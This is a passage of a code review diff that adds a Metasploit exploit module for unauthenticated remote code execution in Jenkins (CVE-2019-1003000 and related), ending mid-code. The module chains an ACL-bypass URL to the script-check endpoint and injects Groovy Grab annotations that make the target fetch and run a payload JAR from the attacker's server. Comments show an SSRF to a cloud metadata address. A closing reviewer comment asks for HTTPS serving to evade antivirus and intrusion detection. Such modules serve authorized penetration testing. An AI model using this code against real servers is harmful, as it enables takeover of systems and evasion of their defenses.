modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -0,0 +1,159 @@
+        'Orange Tsai', # Discovery and PoC
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("#{request.uri} requested")
+
+    unless request.uri.end_with?('.jar')
+      vprint_error('Sending 404')
+      send_not_found(cli)
+      return
+    end
+
+    vprint_good('Sending payload JAR')
+    send_response(
+      cli,
+      payload_jar,
+      'Content-Type' => 'application/java-archive'
+    )
+  end
+
+  def exploit
+    # HACK: Both HttpClient and HttpServer use datastore['SSL']
+    ssl = datastore['SSL']
+    datastore['SSL'] = false
+    start_service('Path' => '/metasploit/exploit/1.0/exploit-1.0.jar')
+    datastore['SSL'] = ssl
+
+    send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1,
+      'vars_get' => {'value' => go_go_gadget2}
+    )
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
+  ?apiUrl=http://169.254.169.254/%23
+  &login=orange
+  &password=tsai
+=end
+  def go_go_gadget1
+    normalize_uri(
+      '/securityRealm/user/admin', # ACL bypass
+      '/descriptorByName',
+      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
+    )
+  end
+
+=begin
+  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
+  ?value=
+  @GrabConfig(disableChecksums=true)%0a
+  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
+  @Grab(group='tw.orange', module='poc', version='1')%0a
+  import Orange;
+=end
+  def go_go_gadget2
+    (
+      <<~EOF
+        @GrabResolver("http://#{srvhost_addr}:#{srvport}/")
```

Comment:
can we optionally (or always) serve the jar over HTTPS? i noticed the SSL hack but HTTPS will make it easy to work with AV/NIDS.